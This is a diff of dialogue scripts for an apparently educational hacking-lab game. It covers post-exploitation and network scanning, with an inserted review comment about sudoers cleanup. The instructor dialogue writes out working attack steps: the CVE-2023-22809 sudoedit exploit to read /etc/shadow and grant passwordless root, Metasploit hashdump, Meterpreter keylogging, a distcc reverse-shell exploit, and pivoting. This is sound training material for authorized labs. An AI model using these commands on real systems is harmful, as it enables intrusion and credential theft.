free -h (memory) + + Advanced Tactics Instructor: df -h (disk space) + + Advanced Tactics Instructor: cat /etc/passwd (user accounts) + + Advanced Tactics Instructor: sudo --version (check for vulnerable sudo) + + Advanced Tactics Instructor: ifconfig or ip a (network interfaces) + + ~ instructor_rapport += 3 + ++ [Show me privilege escalation commands] + Advanced Tactics Instructor: **Privilege Escalation (CVE-2023-22809):** + + Advanced Tactics Instructor: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + + Advanced Tactics Instructor: (View password hashes) + + Advanced Tactics Instructor: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts + + Advanced Tactics Instructor: (Edit sudoers file - be very careful!) + + Advanced Tactics Instructor: In vim: Press Enter, type "Go", press Enter, type "distccd ALL=(ALL) NOPASSWD:ALL" + + Advanced Tactics Instructor: Press Esc, type ":x", press Enter, press Esc, type ":q!", press Enter + + Advanced Tactics Instructor: sudo -i (escalate to root) + + ~ instructor_rapport += 3 + ++ [Show me Linux admin commands] + Advanced Tactics Instructor: **Linux Post-Exploitation:** + + Advanced Tactics Instructor: useradd USERNAME (create user) + + Advanced Tactics Instructor: passwd USERNAME (set password) + + Advanced Tactics Instructor: cat /etc/passwd (list users) + + Advanced Tactics Instructor: sh (spawn command interpreter) + + ~ instructor_rapport += 3 + ++ [Show me Metasploit post modules] + Advanced Tactics Instructor: **Metasploit Post-Exploitation:** + + Advanced Tactics Instructor: Ctrl-Z (background session) + + Advanced Tactics Instructor: sessions (list sessions) + + Advanced Tactics Instructor: use post/linux/gather/checkvm + + Advanced Tactics Instructor: setg SESSION 1 + + Advanced Tactics Instructor: exploit + + Advanced Tactics Instructor: **Useful Post Modules:** + + Advanced Tactics Instructor: post/linux/gather/enum_configs + + Advanced Tactics Instructor: post/linux/gather/enum_network + + Advanced Tactics 
Instructor: post/linux/gather/enum_system + + Advanced Tactics Instructor: post/linux/gather/enum_users_history + + Advanced Tactics Instructor: post/linux/gather/hashdump + + ~ instructor_rapport += 3 + ++ [Show me Meterpreter commands] + Advanced Tactics Instructor: **Meterpreter Commands:** + + Advanced Tactics Instructor: help (list all commands) + + Advanced Tactics Instructor: getuid (current user) + + Advanced Tactics Instructor: getprivs (privileges) + + Advanced Tactics Instructor: ls c:/ (browse files) + + Advanced Tactics Instructor: download FILE (download file) + + Advanced Tactics Instructor: upload LOCAL REMOTE (upload file) + + Advanced Tactics Instructor: ps (list processes) + + Advanced Tactics Instructor: migrate PID (migrate to process) + + Advanced Tactics Instructor: shell (drop to system shell, Ctrl-D to return) + + Advanced Tactics Instructor: run post/windows/gather/hashdump (dump hashes) + + Advanced Tactics Instructor: screenshot (capture screen) + + Advanced Tactics Instructor: keyscan_start / keyscan_dump (keylogging) + + ~ instructor_rapport += 3 + ++ [Show me Armitage commands] + Advanced Tactics Instructor: **Armitage Setup:** + + Advanced Tactics Instructor: sudo msfdb reinit + + Advanced Tactics Instructor: sudo armitage & + + Advanced Tactics Instructor: **Armitage Workflow:** + + Advanced Tactics Instructor: Hosts → Add Host → enter IP + + Advanced Tactics Instructor: Right-click host → Scan + + Advanced Tactics Instructor: Drag exploit onto target icon → Launch + + Advanced Tactics Instructor: Right-click compromised host → Meterpreter → Interact + + Advanced Tactics Instructor: **Pivoting:** + + Advanced Tactics Instructor: Right-click → Meterpreter → Pivoting → Setup → Add Pivot + + ~ instructor_rapport += 3 + +- -> post_exploit_hub + +=== challenge_tips === +Advanced Tactics Instructor: Let me give you practical tips for the post-exploitation challenges. 
+ +~ instructor_rapport += 5 + +Advanced Tactics Instructor: **Exploiting Distcc:** + +Advanced Tactics Instructor: Scan all ports to find distcc: nmap -p- TARGET + +Advanced Tactics Instructor: Use exploit/unix/misc/distcc_exec with cmd/unix/reverse payload + +Advanced Tactics Instructor: You'll get a shell as the distccd user, not root. + ++ [Tips for privilege escalation?] + Advanced Tactics Instructor: Check the sudo version immediately: sudo --version + + Advanced Tactics Instructor: If it's vulnerable (1.8.0-1.9.12p1), use the CVE-2023-22809 exploit. + + Advanced Tactics Instructor: When editing /etc/sudoers with vim, follow the commands EXACTLY - one wrong keystroke can break the VM. + + Advanced Tactics Instructor: After editing sudoers, run: sudo -i to become root. + + Advanced Tactics Instructor: Verify with: id -u (should show 0) + + ~ instructor_rapport += 5 + ++ [Tips for using post-exploitation modules?] + Advanced Tactics Instructor: Always background your session first with Ctrl-Z + + Advanced Tactics Instructor: Use "setg SESSION ID" to set the session globally for all modules. + + Advanced Tactics Instructor: Run multiple enum modules to gather comprehensive information. + + Advanced Tactics Instructor: The output tells you where loot is stored - check those files! + + Advanced Tactics Instructor: Not all modules work perfectly - if one fails, move on to others. + + ~ instructor_rapport += 5 + ++ [Tips for using Meterpreter and Armitage?] + Advanced Tactics Instructor: Exploit the Windows server with easyftp to get a Meterpreter session. + + Advanced Tactics Instructor: Use getuid and getprivs to understand your privileges immediately. + + Advanced Tactics Instructor: Browse to user desktops to find flags: ls C:\\Users\\ + + Advanced Tactics Instructor: Try both Meterpreter commands and Armitage's GUI features. + + Advanced Tactics Instructor: If Meterpreter becomes unresponsive, restart the Windows VM and re-exploit. 
+ + ~ instructor_rapport += 5 + ++ [Tips for pivoting?] + Advanced Tactics Instructor: Set up a pivot through the Windows system to attack Linux. + + Advanced Tactics Instructor: In Armitage: Right-click Windows → Meterpreter → Pivoting → Setup → Add Pivot + + Advanced Tactics Instructor: Add the Linux target: Hosts → Add Hosts → enter Linux IP + + Advanced Tactics Instructor: Scan and exploit through the pivot - it will be slower but will work. + + Advanced Tactics Instructor: The Armitage interface shows the routing path visually. + + ~ instructor_rapport += 5 + ++ [Where are the flags?] + Advanced Tactics Instructor: Linux flags are in user home directories under /home/ + + Advanced Tactics Instructor: Use find /home -name "*flag*" to search for them. + + Advanced Tactics Instructor: Windows flags are on user Desktops: C:\\Users\\USERNAME\\Desktop\\ + + Advanced Tactics Instructor: One Linux challenge involves cracking a protected.zip file. + + Advanced Tactics Instructor: You'll need to dump password hashes and crack them to get the zip password. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== ready_for_practice === +Advanced Tactics Instructor: Excellent! You're ready for advanced post-exploitation techniques. + +~ instructor_rapport += 10 +~ post_exploit_mastery += 10 + +Advanced Tactics Instructor: This lab completes your understanding of the full attack lifecycle - from initial reconnaissance through exploitation to post-exploitation. + +Advanced Tactics Instructor: You'll exploit systems, escalate privileges, gather sensitive data, and pivot through networks. + +Advanced Tactics Instructor: Remember: these techniques are powerful and potentially destructive. Use them only for authorized penetration testing and defensive security. + ++ [Any final advice?] + Advanced Tactics Instructor: Work methodically. After each exploitation, assess your access, gather information, then escalate privileges. 
+ + Advanced Tactics Instructor: Take careful notes of what you find - credentials, software versions, vulnerable services. + + Advanced Tactics Instructor: When using the sudo privilege escalation, follow the vim commands EXACTLY. Practice on a non-critical system first if you're nervous. + + Advanced Tactics Instructor: Explore both Meterpreter commands and Armitage's interface to see which you prefer. + + Advanced Tactics Instructor: Don't get frustrated if something doesn't work - exploit reliability varies. Try restarting VMs and trying again. + + Advanced Tactics Instructor: Most importantly: understand WHY each technique works, not just HOW to execute it. + + Advanced Tactics Instructor: Good luck, Agent {player_name}. This is where you demonstrate the full impact of system compromise. + + ~ instructor_rapport += 10 + +- -> post_exploit_hub + +-> END diff --git a/story_design/ink/game_scenarios/scanning.ink b/story_design/ink/game_scenarios/scanning.ink new file mode 100644 index 0000000..4e5633d --- /dev/null +++ b/story_design/ink/game_scenarios/scanning.ink 
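Review bot: in `commands_reference` the privilege escalation step has the learner append `distccd ALL=(ALL) NOPASSWD:ALL` to /etc/sudoers, but neither `challenge_tips` nor `ready_for_practice` ever tells them to remove that entry once `sudo -i` has worked, so the lab VM is left with a persistent passwordless root grant for a service account; add a cleanup line after "sudo -i (escalate to root)" (for example "Afterwards, remove the distccd line from /etc/sudoers with visudo") so the post-exploitation section models the cleanup an authorized engagement requires. Also, the same hunk gives the full-port scan as `nmap -p 1-65535 TARGET` in `commands_reference` and as `nmap -p- TARGET` in `challenge_tips`; the two are equivalent, but pick one form so the reference and the tips agree.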
@@ -0,0 +1,1008 @@ +// Information Gathering: Scanning Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/5_scanning.md +// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Thalita Vergilio +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR scanning_ethics = 0 + +// External variables +EXTERNAL player_name + +=== start === +Reconnaissance Specialist: "Give me six hours to chop down a tree and I will spend the first four sharpening the axe." -- Abraham Lincoln + +~ instructor_rapport = 0 +~ scanning_ethics = 0 + +Reconnaissance Specialist: Welcome, Agent {player_name}. I'm your instructor for Information Gathering and Network Scanning. + +Reconnaissance Specialist: Scanning is a critical stage for both attackers and security testers. It gives you all the information you need to plan an attack - IP addresses, open ports, service versions, and operating systems. + +Reconnaissance Specialist: Once you know what software is running and what version it is, you can look up and use known attacks against the target. + +Reconnaissance Specialist: This knowledge is powerful. Use it only for authorized security testing, penetration testing engagements, and defensive purposes. + +~ scanning_ethics += 10 + +-> scanning_hub + +=== scanning_hub === +Reconnaissance Specialist: What aspect of scanning and information gathering would you like to explore? + ++ [Why is scanning so important?] 
+ -> scanning_importance ++ [Ping sweeps for finding live hosts] + -> ping_sweeps ++ [Creating a ping sweep bash script] + -> ping_sweep_script ++ [Introduction to Nmap] + -> nmap_intro ++ [Ports and port scanning basics] + -> ports_intro ++ [TCP three-way handshake] + -> tcp_handshake ++ [Creating a port scanner bash script] + -> port_scanner_script ++ [Nmap port scanning techniques] + -> nmap_port_scanning ++ [Service identification and banner grabbing] + -> service_identification ++ [Protocol analysis and fingerprinting] + -> protocol_analysis ++ [Operating system detection] + -> os_detection ++ [Nmap timing and performance options] + -> nmap_timing ++ [Nmap output and GUIs] + -> nmap_output ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +=== scanning_importance === +Reconnaissance Specialist: Scanning is often the most important phase of an attack or security assessment. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: After establishing a list of live hosts, you examine the attack surface - what there is that could be attacked on each system. + +Reconnaissance Specialist: Any way that a remote computer accepts communication has the potential to be attacked. + +Reconnaissance Specialist: For security testers and network administrators, scanning helps map out a network, understand what's running where, and identify potential security problems before attackers find them. + ++ [What information does scanning reveal?] + Reconnaissance Specialist: Scanning typically reveals IP addresses of live hosts, open ports on those hosts, what services are running on each port, the versions of those services, and often the operating system. 
+ + Reconnaissance Specialist: With this information, you can look up known vulnerabilities for those specific software versions and plan your attack or remediation accordingly. + + Reconnaissance Specialist: A well-executed scanning stage is extremely important when looking for potential security problems. + + ~ instructor_rapport += 5 + ++ [Is scanning legal?] + Reconnaissance Specialist: Excellent question. Scanning networks and systems without authorization is typically illegal in most jurisdictions. + + Reconnaissance Specialist: You need explicit written permission to scan systems you don't own. This includes networks at your school, workplace, or anywhere else unless you have authorization. + + Reconnaissance Specialist: In penetration testing engagements, you'll have a statement of work or rules of engagement that defines what you're allowed to scan. + + Reconnaissance Specialist: In this lab environment, you have permission to scan the provided VMs. Never scan external networks without authorization. + + ~ scanning_ethics += 10 + ++ [What's the difference between passive and active reconnaissance?] + Reconnaissance Specialist: Great question! Passive reconnaissance involves gathering information without directly interacting with the target - like looking up DNS records or searching public websites. + + Reconnaissance Specialist: Active reconnaissance, which includes scanning, directly interacts with the target systems and can be detected. + + Reconnaissance Specialist: Scanning sends packets to the target, which can trigger intrusion detection systems and will show up in logs. + + Reconnaissance Specialist: This is why timing and stealth can be important, though in authorized testing you may not need to be stealthy. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== ping_sweeps === +Reconnaissance Specialist: Ping sweeps are used to identify live hosts on a network. They're often the first step in network reconnaissance. 
+ +~ instructor_rapport += 5 + +Reconnaissance Specialist: The ping command works by sending an ICMP echo request to a target. Most hosts will reply with an ICMP echo response. + +Reconnaissance Specialist: However, Windows PC firewalls typically block incoming ping requests by default, so ping isn't always reliable. + ++ [How do I use the ping command?] + Reconnaissance Specialist: The basic use is: ping DESTINATION + + Reconnaissance Specialist: Where DESTINATION is an IP address or hostname. + + Reconnaissance Specialist: By default, ping keeps sending requests until you press Ctrl-C. You can limit the count with the -c flag. + + Reconnaissance Specialist: For example: ping -c 3 10.0.0.1 + + Reconnaissance Specialist: This sends exactly 3 echo requests. + + Reconnaissance Specialist: The -W flag sets the timeout in seconds: ping -c 1 -W 1 10.0.0.1 + + ~ instructor_rapport += 5 + ++ [How can I ping a whole network range?] + Reconnaissance Specialist: You could manually ping each IP address in the range, but that's tedious and inefficient. + + Reconnaissance Specialist: A better approach is to write a bash script that loops through all IPs in the range. + + Reconnaissance Specialist: Or, even better, use Nmap which can do this far more efficiently. + + Reconnaissance Specialist: Nmap doesn't wait for each response before sending the next request, making it much faster. + + ~ instructor_rapport += 5 + ++ [Tell me about creating a ping sweep script] + -> ping_sweep_script + +- -> scanning_hub + +=== ping_sweep_script === +Reconnaissance Specialist: Creating your own tools helps you understand how they work. Let's build a ping sweep bash script. 
+ +~ instructor_rapport += 5 + +Reconnaissance Specialist: Here's a basic structure: + +Reconnaissance Specialist: #!/bin/bash + +Reconnaissance Specialist: if [ $# -ne 1 ]; then + +Reconnaissance Specialist: echo "Usage: `basename $0` {three octets of IP, for example 192.168.0}" + +Reconnaissance Specialist: exit 1 + +Reconnaissance Specialist: fi + +Reconnaissance Specialist: ip_address_start=$1 + +Reconnaissance Specialist: for i in {1..254}; do + +Reconnaissance Specialist: ping -c 1 -W 1 $ip_address_start.$i | grep 'from' + +Reconnaissance Specialist: done + ++ [How does this script work?] + Reconnaissance Specialist: Let me break it down. First, we check if the user provided exactly one argument (the first three octets of an IP address). + + Reconnaissance Specialist: If not, we print usage instructions and exit with an error code. + + Reconnaissance Specialist: Then we store the argument in a variable called ip_address_start. + + Reconnaissance Specialist: The for loop iterates from 1 to 254 (all valid host addresses in a /24 subnet). + + Reconnaissance Specialist: For each iteration, we ping that IP with one request and a 1-second timeout, then pipe to grep to only show successful responses. + + ~ instructor_rapport += 5 + ++ [How do I make the script executable?] + Reconnaissance Specialist: After saving the script, you need to set the executable permission: + + Reconnaissance Specialist: chmod +x pingsweep.sh + + Reconnaissance Specialist: The chmod command changes file modes or permissions. The +x flag adds execute permission. + + Reconnaissance Specialist: You can verify with: ls -la + + Reconnaissance Specialist: You'll see an 'x' in the permissions, indicating the file can be executed. + + ~ instructor_rapport += 5 + ++ [How long will this take to run?] + Reconnaissance Specialist: Good thinking! With the -W 1 timeout, each ping waits up to 1 second for a response. 
+ + Reconnaissance Specialist: Since we're checking 254 addresses sequentially, in the worst case (no hosts respond), it could take up to 254 seconds - over 4 minutes! + + Reconnaissance Specialist: This is why professional tools like Nmap are so much faster - they send requests in parallel and use more sophisticated timing. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== nmap_intro === +Reconnaissance Specialist: Nmap - Network Mapper - is without a doubt the most popular scanning tool in existence. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: Nmap is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. + +Reconnaissance Specialist: It uses raw IP packets in novel ways to determine what hosts are available, what services they're offering, what operating systems they're running, what type of packet filters are in use, and much more. + ++ [What makes Nmap so powerful?] + Reconnaissance Specialist: Nmap supports dozens of different scanning techniques, from simple ping sweeps to complex protocol analysis. + + Reconnaissance Specialist: It can identify services, detect versions, fingerprint operating systems, evade firewalls, and output results in various formats. + + Reconnaissance Specialist: It's actively maintained, has extensive documentation, and is scriptable with the Nmap Scripting Engine (NSE). + + Reconnaissance Specialist: Most importantly, it's extremely fast and efficient compared to manual or simple scripted approaches. + + ~ instructor_rapport += 5 + ++ [How do I use Nmap for ping sweeps?] + Reconnaissance Specialist: For a basic ping sweep: nmap -sn -PE 10.0.0.1-254 + + Reconnaissance Specialist: The -sn flag tells Nmap to skip port scanning (just do host discovery). + + Reconnaissance Specialist: The -PE flag specifies ICMP echo requests. 
+ + Reconnaissance Specialist: Nmap's default host discovery with -sn is actually more comprehensive than just ping - it sends ICMP echo requests, TCP SYN to port 443, TCP ACK to port 80, and ICMP timestamp requests. + + Reconnaissance Specialist: This gives you a better chance of detecting hosts even if they block regular pings. + + ~ instructor_rapport += 5 + ++ [Can Nmap resolve hostnames?] + Reconnaissance Specialist: Yes! Nmap performs DNS resolution by default. + + Reconnaissance Specialist: You can do a list scan with: nmap -sL 10.0.0.1-254 + + Reconnaissance Specialist: This lists all hosts with their hostnames without actually scanning them. + + Reconnaissance Specialist: The hostnames can be very informative - names like "web-server-01" or "database-prod" tell you a lot about what a system does. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== ports_intro === +Reconnaissance Specialist: Understanding ports is fundamental to network scanning and security. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: All TCP and UDP traffic uses port numbers to establish which applications are communicating. + +Reconnaissance Specialist: For example, web servers typically listen on port 80 for HTTP or port 443 for HTTPS. Email servers use ports 25 (SMTP), 110 (POP3), or 143 (IMAP). + +Reconnaissance Specialist: There are 65,535 possible TCP ports and 65,535 possible UDP ports on each system. + ++ [Why do standard services use specific ports?] + Reconnaissance Specialist: Standard port numbers make networking practical. When you type a URL in your browser, it knows to connect to port 80 or 443 without you specifying it. + + Reconnaissance Specialist: The Internet Assigned Numbers Authority (IANA) maintains the official registry of port number assignments. 
+ + Reconnaissance Specialist: On Linux systems, you can see common port assignments in /etc/services + + Reconnaissance Specialist: Ports 1-1023 are well-known ports typically requiring admin privileges to bind to. Ports 1024-49151 are registered ports. Ports 49152-65535 are dynamic/private ports. + + ~ instructor_rapport += 5 + ++ [How can I manually check if a port is open?] + Reconnaissance Specialist: You can use telnet or netcat to connect manually: + + Reconnaissance Specialist: telnet IP_ADDRESS 80 + + Reconnaissance Specialist: If you see "Connected to..." the port is open. If it says "Connection refused" or times out, the port is closed or filtered. + + Reconnaissance Specialist: Netcat is similar: nc IP_ADDRESS 80 + + Reconnaissance Specialist: This manual approach helps you understand what's happening, but it's not practical for scanning many ports. + + ~ instructor_rapport += 5 + ++ [What's the difference between open, closed, and filtered ports?] + Reconnaissance Specialist: An open port has an application actively listening and accepting connections. + + Reconnaissance Specialist: A closed port has no application listening, but the system responded to your probe (usually with a RST packet). + + Reconnaissance Specialist: A filtered port means a firewall or filter is blocking the probe, so you can't determine if it's open or closed. + + Reconnaissance Specialist: You might also see states like "open|filtered" when Nmap can't definitively determine the state. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== tcp_handshake === +Reconnaissance Specialist: Understanding the TCP three-way handshake is crucial for understanding port scanning techniques. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: To establish a TCP connection and start sending data, a three-way handshake occurs: + +Reconnaissance Specialist: Step 1: The client sends a TCP packet with the SYN flag set, indicating it wants to start a new connection to a specific port. 
+ +Reconnaissance Specialist: Step 2: If a server is listening on that port, it responds with SYN-ACK flags set, accepting the connection. + +Reconnaissance Specialist: Step 3: The client completes the connection by sending a packet with the ACK flag set. + ++ [What happens if the port is closed?] + Reconnaissance Specialist: If the port is closed, the server will send a RST (reset) packet at step 2 instead of SYN-ACK. + + Reconnaissance Specialist: This immediately tells the client the port is closed. + + Reconnaissance Specialist: If there's a firewall filtering that port, you might not receive any reply at all - the packets are simply dropped. + + ~ instructor_rapport += 5 + ++ [Why is this relevant to scanning?] + Reconnaissance Specialist: Here's the key insight: if all we want to know is whether a port is open, we can skip step 3! + + Reconnaissance Specialist: The SYN-ACK response at step 2 already tells us the port is open. + + Reconnaissance Specialist: This is the basis for SYN scanning - send SYN, wait for SYN-ACK, then don't complete the handshake. + + Reconnaissance Specialist: It's faster and stealthier than completing the full connection, though modern IDS systems will still detect it. + + ~ instructor_rapport += 5 + ++ [What's a full connect scan then?] + Reconnaissance Specialist: A full connect scan completes the entire three-way handshake for each port. + + Reconnaissance Specialist: It's less efficient because you're establishing complete connections, but it doesn't require special privileges. + + Reconnaissance Specialist: SYN scans need to write raw packets, which requires root privileges on Linux. Connect scans use standard library functions available to any user. + + Reconnaissance Specialist: In Nmap, -sT does a connect scan, while -sS does a SYN scan. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== port_scanner_script === +Reconnaissance Specialist: Let's build a simple port scanner in bash to understand how port scanning works. 
+ +~ instructor_rapport += 5 + +Reconnaissance Specialist: Modern bash can connect to TCP ports using special file descriptors like /dev/tcp/HOST/PORT + +Reconnaissance Specialist: Here's a basic port scanner structure: + +Reconnaissance Specialist: #!/bin/bash + +Reconnaissance Specialist: if [ $# -ne 1 ]; then + +Reconnaissance Specialist: echo "Usage: `basename $0` {IP address or hostname}" + +Reconnaissance Specialist: exit 1 + +Reconnaissance Specialist: fi + +Reconnaissance Specialist: ip_address=$1 + +Reconnaissance Specialist: echo `date` >> $ip_address.open_ports + +Reconnaissance Specialist: for port in {1..65535}; do + +Reconnaissance Specialist: timeout 1 echo > /dev/tcp/$ip_address/$port + +Reconnaissance Specialist: if [ $? -eq 0 ]; then + +Reconnaissance Specialist: echo "port $port is open" >> "$ip_address.open_ports" + +Reconnaissance Specialist: fi + +Reconnaissance Specialist: done + ++ [How does this work?] + Reconnaissance Specialist: The script takes one argument - the IP address to scan. + + Reconnaissance Specialist: It loops through all 65,535 possible ports (this will take a very long time!). + + Reconnaissance Specialist: For each port, it tries to connect using echo > /dev/tcp/$ip_address/$port + + Reconnaissance Specialist: The timeout command ensures each attempt only waits 1 second. + + Reconnaissance Specialist: The special variable $? contains the exit status of the last command - 0 for success, non-zero for failure. + + Reconnaissance Specialist: If the connection succeeded ($? equals 0), we write that port number to the output file. + + ~ instructor_rapport += 5 + ++ [Why would I write this when Nmap exists?] + Reconnaissance Specialist: Great question! Writing your own tools teaches you how they work under the hood. + + Reconnaissance Specialist: It helps you understand what's actually happening when you run Nmap. 
+ + Reconnaissance Specialist: In some restricted environments, you might not have Nmap available but can write bash scripts. + + Reconnaissance Specialist: Plus, it's a good programming exercise! You could extend it to do banner grabbing, run it in parallel, or output in different formats. + + ~ instructor_rapport += 5 + ++ [How long will scanning all 65535 ports take?] + Reconnaissance Specialist: With a 1-second timeout per port, in the worst case it could take over 18 hours! + + Reconnaissance Specialist: This is why professional scanners like Nmap are so much more sophisticated - they use parallel connections, adaptive timing, and send raw packets. + + Reconnaissance Specialist: Your simple bash script is doing full TCP connect scans sequentially. Nmap can send hundreds of packets simultaneously. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== nmap_port_scanning === +Reconnaissance Specialist: Nmap supports dozens of different port scanning techniques. Let me cover the most important ones. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: **SYN Scan (-sS):** The default and most popular scan. Sends SYN packets and looks for SYN-ACK responses. Fast and stealthy. Requires root. + +Reconnaissance Specialist: **Connect Scan (-sT):** Completes the full TCP handshake. Slower but doesn't require root privileges. + +Reconnaissance Specialist: **UDP Scan (-sU):** Scans UDP ports. Slower and less reliable because UDP is connectionless. + +Reconnaissance Specialist: **NULL, FIN, and Xmas Scans (-sN, -sF, -sX):** Send packets with unusual flag combinations to evade some firewalls. Don't work against Windows. + ++ [Tell me more about SYN scans] + Reconnaissance Specialist: SYN scans are the default Nmap scan type for good reason. + + Reconnaissance Specialist: They're fast because they don't complete the connection. They're relatively stealthy compared to connect scans. 
+ + Reconnaissance Specialist: However, modern intrusion detection systems will absolutely detect SYN scans - the "stealth" is relative. + + Reconnaissance Specialist: Run a SYN scan with: sudo nmap -sS TARGET + + Reconnaissance Specialist: You need sudo because sending raw SYN packets requires root privileges. + + ~ instructor_rapport += 5 + ++ [Why are UDP scans unreliable?] + Reconnaissance Specialist: UDP is connectionless - there's no handshake like TCP. You send a packet and hope for a response. + + Reconnaissance Specialist: If a UDP port is open, the service might not respond at all. If it's closed, you might get an ICMP "port unreachable" message. + + Reconnaissance Specialist: The lack of response is ambiguous - is the port open and ignoring you, or is it filtered by a firewall? + + Reconnaissance Specialist: UDP scans are also slow because Nmap has to wait for timeouts: sudo nmap -sU TARGET + + Reconnaissance Specialist: Despite these challenges, UDP scanning is important because many services run on UDP like DNS (port 53) and SNMP (port 161). + + ~ instructor_rapport += 5 + ++ [What are NULL, FIN, and Xmas scans?] + Reconnaissance Specialist: These send TCP packets with unusual flag combinations to try to evade simple firewalls. + + Reconnaissance Specialist: NULL scan (-sN) sends packets with no flags set. FIN scan (-sF) sends packets with only the FIN flag. Xmas scan (-sX) sends FIN, PSH, and URG flags. + + Reconnaissance Specialist: According to RFC 793, a closed port should respond with RST to these probes, while open ports should not respond. + + Reconnaissance Specialist: However, Windows systems don't follow the RFC correctly, so these scans don't work against Windows targets. + + Reconnaissance Specialist: They're less useful today since modern firewalls and IDS systems detect them easily. + + ~ instructor_rapport += 5 + ++ [How do I specify which ports to scan?] + Reconnaissance Specialist: Nmap has flexible port specification options. 
+ + Reconnaissance Specialist: By default, Nmap scans the 1000 most common ports. You can scan specific ports with -p: + + Reconnaissance Specialist: nmap -p 80,443,8080 TARGET (specific ports) + + Reconnaissance Specialist: nmap -p 1-1000 TARGET (port range) + + Reconnaissance Specialist: nmap -p- TARGET (all 65535 ports) + + Reconnaissance Specialist: nmap -F TARGET (fast scan - only 100 most common ports) + + Reconnaissance Specialist: You can also use -r to scan ports in sequential order instead of random. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== service_identification === +Reconnaissance Specialist: Knowing which ports are open is useful, but knowing what services are running on those ports is essential for planning attacks or security assessments. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: The simplest approach is banner grabbing - connecting to a port and checking if the service reveals what software it's running. + +Reconnaissance Specialist: Many services present a banner when you connect, often stating the software name and version. + ++ [How do I manually grab banners?] + Reconnaissance Specialist: You can use netcat to connect and see what the service sends: + + Reconnaissance Specialist: nc IP_ADDRESS 21 + + Reconnaissance Specialist: Port 21 (FTP) usually sends a banner immediately. Press Ctrl-C to disconnect. + + Reconnaissance Specialist: For port 80 (HTTP), you need to send something first: + + Reconnaissance Specialist: nc IP_ADDRESS 80 + + Reconnaissance Specialist: Then type a dot and press Enter a few times. Look for the "Server:" header in the response. + + ~ instructor_rapport += 5 + ++ [How can I automate banner grabbing?] + Reconnaissance Specialist: Netcat can grab banners across a range of ports: + + Reconnaissance Specialist: nc IP_ADDRESS 1-2000 -w 1 + + Reconnaissance Specialist: This connects to ports 1 through 2000 with a 1-second timeout and displays any banners. 
+ + Reconnaissance Specialist: You could also update your bash port scanner script to read from each open port instead of just writing to it. + + ~ instructor_rapport += 5 + ++ [Can I trust banner information?] + Reconnaissance Specialist: Excellent critical thinking! No, you cannot trust banners completely. + + Reconnaissance Specialist: Server administrators can configure services to report false version information to mislead attackers. + + Reconnaissance Specialist: A web server claiming to be "Apache/2.4.1" might actually be nginx or a completely different version of Apache. + + Reconnaissance Specialist: This is why we use protocol analysis and fingerprinting to verify what's actually running. + + ~ instructor_rapport += 5 + ++ [Tell me about protocol analysis] + -> protocol_analysis + +- -> scanning_hub + +=== protocol_analysis === +Reconnaissance Specialist: Protocol analysis, also called fingerprinting, determines what software is running by analyzing how it responds to various requests. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: Instead of trusting what the banner says, we send different kinds of requests (triggers) and compare the responses to a database of fingerprints. + +Reconnaissance Specialist: The software Amap pioneered this approach with two main features: banner grabbing (-B flag) and protocol analysis (-A flag). + ++ [How do I use Amap?] + Reconnaissance Specialist: Amap is straightforward but somewhat outdated: + + Reconnaissance Specialist: amap -A IP_ADDRESS 80 + + Reconnaissance Specialist: This performs protocol analysis on port 80, telling you what protocol is in use and what software is likely running. + + Reconnaissance Specialist: However, Amap has been largely superseded by Nmap's service detection, which is more up-to-date and accurate. + + ~ instructor_rapport += 5 + ++ [How does Nmap's version detection work?] 
+ Reconnaissance Specialist: Nmap's version detection is one of its most powerful features: + + Reconnaissance Specialist: nmap -sV IP_ADDRESS + + Reconnaissance Specialist: Nmap connects to each open port and sends various triggers, then analyzes the responses against a massive database of service signatures. + + Reconnaissance Specialist: It can often identify not just the service type but the specific version number. + + Reconnaissance Specialist: You can combine it with port specification: nmap -sV -p 80 IP_ADDRESS + + Reconnaissance Specialist: Or scan all default ports with version detection: nmap -sV IP_ADDRESS + + ~ instructor_rapport += 5 + ++ [How accurate is version detection?] + Reconnaissance Specialist: Nmap's version detection is very accurate when services respond normally. + + Reconnaissance Specialist: It maintains a database called nmap-service-probes with thousands of service signatures. + + Reconnaissance Specialist: However, custom or heavily modified services might not match the database perfectly. + + Reconnaissance Specialist: And determined administrators can still configure services to mislead fingerprinting, though it's more difficult than changing a banner. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== os_detection === +Reconnaissance Specialist: Operating system detection is another powerful Nmap capability that helps you understand your target. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: Knowing the OS is important for choosing the right payload when launching exploits, and for understanding what vulnerabilities might be present. + +Reconnaissance Specialist: Nmap performs OS detection by analyzing subtle differences in how operating systems implement TCP/IP. + ++ [How does OS fingerprinting work?] + Reconnaissance Specialist: The TCP/IP RFCs (specifications) contain some ambiguity - they're not 100% prescriptive about every implementation detail. 
